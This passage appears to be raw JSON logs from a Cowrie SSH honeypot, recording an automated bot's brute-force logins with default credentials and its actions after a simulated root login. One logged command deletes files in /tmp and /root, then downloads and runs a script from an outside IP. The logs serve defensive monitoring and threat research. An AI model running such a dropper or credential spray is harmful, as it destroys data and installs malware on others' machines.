""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.215998Z","src_ip":"87.120.191.13","session":"76a8bf183454"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.218175Z","src_ip":"87.120.191.13","session":"843c9496257b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.219140Z","src_ip":"87.120.191.13","session":"642d837648d1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.220052Z","src_ip":"87.120.191.13","session":"c52a9fbc1ccf"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.221038Z","src_ip":"87.120.191.13","session":"5730ae3214a8"}
{"eventid":"cowrie.login.failed","username":"noc","password":"admin","message":"login attempt [noc/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.363844Z","src_ip":"87.120.191.13","session":"642d837648d1"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.378381Z","src_ip":"87.120.191.13","session":"ec952d8099ac"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin","message":"login attempt [ubnt/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.382440Z","src_ip":"87.120.191.13","session":"843c9496257b"}
{"eventid":"cowrie.login.failed","username":"student","password":"admin","message":"login attempt [student/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.384952Z","src_ip":"87.120.191.13","session":"5730ae3214a8"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.402868Z","src_ip":"87.120.191.13","session":"7b71e6d0d080"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin","message":"login attempt [pi/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.404441Z","src_ip":"87.120.191.13","session":"c52a9fbc1ccf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.405403Z","src_ip":"87.120.191.13","session":"b366d603f02e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.411273Z","src_ip":"87.120.191.13","session":"76a8bf183454"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38446,"dst_ip":"1.2.3.4","dst_port":22,"session":"5844e412b204","protocol":"ssh","message":"New connection: 87.120.191.13:38446 (1.2.3.4:22) [session: 5844e412b204]","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.477344Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:53:25.517733Z","src_ip":"87.120.191.13","session":"7b71e6d0d080"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.518453Z","src_ip":"87.120.191.13","session":"7b71e6d0d080"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.519750Z","src_ip":"87.120.191.13","session":"5844e412b204"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.520328Z","src_ip":"87.120.191.13","session":"5844e412b204"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.576976Z","src_ip":"87.120.191.13","session":"7b71e6d0d080"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.578322Z","src_ip":"87.120.191.13","session":"7b71e6d0d080"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38460,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ca8d1d1a7c4","protocol":"ssh","message":"New connection: 87.120.191.13:38460 (1.2.3.4:22) [session: 0ca8d1d1a7c4]","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.607733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.623245Z","src_ip":"87.120.191.13","session":"0ca8d1d1a7c4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.641018Z","src_ip":"87.120.191.13","session":"0ca8d1d1a7c4"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.697876Z","src_ip":"87.120.191.13","session":"5844e412b204"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:53:25.827010Z","src_ip":"87.120.191.13","session":"5844e412b204"}
{"eventid":"cowrie.command.input","input":"cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","message":"CMD: cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.827663Z","src_ip":"87.120.191.13","session":"5844e412b204"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.833768Z","src_ip":"87.120.191.13","session":"0ca8d1d1a7c4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","size":139,"shasum":"ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.892707Z","src_ip":"87.120.191.13","session":"5844e412b204"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:25.946997Z","src_ip":"87.120.191.13","session":"5844e412b204"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.417206Z","src_ip":"87.120.191.13","session":"642d837648d1"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.420123Z","src_ip":"87.120.191.13","session":"5730ae3214a8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.420819Z","src_ip":"87.120.191.13","session":"843c9496257b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.430769Z","src_ip":"87.120.191.13","session":"ec952d8099ac"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.432797Z","src_ip":"87.120.191.13","session":"b366d603f02e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.434198Z","src_ip":"87.120.191.13","session":"c52a9fbc1ccf"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38464,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3c65ca0fb46","protocol":"ssh","message":"New connection: 87.120.191.13:38464 (1.2.3.4:22) [session: e3c65ca0fb46]","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.443115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.446380Z","src_ip":"87.120.191.13","session":"e3c65ca0fb46"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.447127Z","src_ip":"87.120.191.13","session":"76a8bf183454"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38476,"dst_ip":"1.2.3.4","dst_port":22,"session":"81ac060622af","protocol":"ssh","message":"New connection: 87.120.191.13:38476 (1.2.3.4:22) [session: 81ac060622af]","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.450352Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38480,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdec22105599","protocol":"ssh","message":"New connection: 87.120.191.13:38480 (1.2.3.4:22) [session: fdec22105599]","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.451313Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38488,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd73de86ce2c","protocol":"ssh","message":"New connection: 87.120.191.13:38488 (1.2.3.4:22) [session: cd73de86ce2c]","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.453279Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38512,"dst_ip":"1.2.3.4","dst_port":22,"session":"940e88faa3a6","protocol":"ssh","message":"New connection: 87.120.191.13:38512 (1.2.3.4:22) [session: 940e88faa3a6]","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.466844Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38496,"dst_ip":"1.2.3.4","dst_port":22,"session":"935de9e6125e","protocol":"ssh","message":"New connection: 87.120.191.13:38496 (1.2.3.4:22) [session: 935de9e6125e]","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.467666Z"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.468532Z","src_ip":"87.120.191.13","session":"e3c65ca0fb46"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.471012Z","src_ip":"87.120.191.13","session":"cd73de86ce2c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.471749Z","src_ip":"87.120.191.13","session":"935de9e6125e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.472482Z","src_ip":"87.120.191.13","session":"fdec22105599"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.472962Z","src_ip":"87.120.191.13","session":"fdec22105599"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.474196Z","src_ip":"87.120.191.13","session":"81ac060622af"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.474800Z","src_ip":"87.120.191.13","session":"81ac060622af"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38514,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe7affc766f2","protocol":"ssh","message":"New connection: 87.120.191.13:38514 (1.2.3.4:22) [session: fe7affc766f2]","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.476669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.477593Z","src_ip":"87.120.191.13","session":"940e88faa3a6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.478276Z","src_ip":"87.120.191.13","session":"fe7affc766f2"}
